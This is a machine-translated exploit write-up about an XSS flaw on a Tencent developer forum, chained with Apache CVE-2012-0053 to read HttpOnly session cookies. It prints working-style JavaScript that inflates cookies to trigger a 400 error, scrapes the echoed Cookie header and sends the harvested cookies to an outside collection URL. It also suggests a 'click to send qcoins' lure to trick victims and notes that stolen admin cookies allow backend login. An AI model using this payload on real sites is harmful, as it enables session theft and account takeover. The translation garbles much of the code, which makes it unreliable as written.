A Tencent Forum XSS obtains httponly

http://bbs.open.qq.com/ Is APACHE server, because of the existence of CVE-2012-0053, coupled with a small cross-site, you can get httponly cookie test environment: win7 + Firefox browser 19 briefly said 1. this forum is on the APACHE server, there is a CVE-2012-0053, this thing can break through HTTPONLY, you must know so we came anywhere, send a picture, and then write in the introduction: DZ limits the length. The short domain name can be embedded with the above Code. A click is required to trigger the cross-site operation. (remember someone submitted this hole, you forgot your name ...... Sorry ...... But it is not the focus of this article. I will not discuss it.) How can we ask others to click images? Write a picture: Click to send qcoins? How is it? 2. the AUTH of DZ X2.5 is HTTPONLY, so DZ often ignores XSS vulnerabilities, right? However, due to APACHE vulnerabilities, we can break through HTTPONLY, for example, the following JS (for poor writing, please forgive me ......) MakeRequest (); function setCookies (good) {var str = ""; for (var I = 0; I <819; I ++) {str + = "x ";} for (I = 0; I <10; I ++) {if (good) {var cookie = "xss" + I + "=; expires = "+ new Date ()-1 ). toUTCString () + "; path =/;" ;}else {var cookie = "xss" + I + "=" + str + "; path =/";} document. cookie = cookie ;}} function makeRequest () {setCookies (); function parseCookies () {var cookie_dict ={}; if (xhr. readyState === 4 & xhr. status = 400) {var content = xhr. responseText. replace (/\ r | \ n/g ,''). match (/

(.+)<\/pre>/);

If (content. length) {content = content [1]. replace ("Cookie:", ""); var cookies = content. replace (/xss \ d = x + ;? /G, ''). split (/;/g); for (var I = 0; I Var s_c = cookies [I]. split ('=', 2); cookie_dict [s_c [0] = s_c [1] ;}} setCookies (true); var x = new Image (); try {var myopener = ''; myopener = window. opener & window. opener. location? Window. opener. location: '';} catch (err) {} x. src =' http://www.xxxx.com/save.php?cookie= '+ EncodeURIComponent (JSON. stringify (cookie_dict);} var xhr = new XMLHttpRequest (); xhr. onreadystatechange = parseCookies; xhr. open ("GET", "httponly. php ", true); xhr. send (null);} 3. then let's take a look at the obtained information. The cute auth is revealed, isn't it ~~
4. How can the Administrator be tempted to give it a bigger purpose? This is free to use. I only tested it on my own intranet. It is indeed possible to log on to the background using this COOKIE. However, the administrator needs to log on to the background and change the request header first ~~

Solution:

You know better than me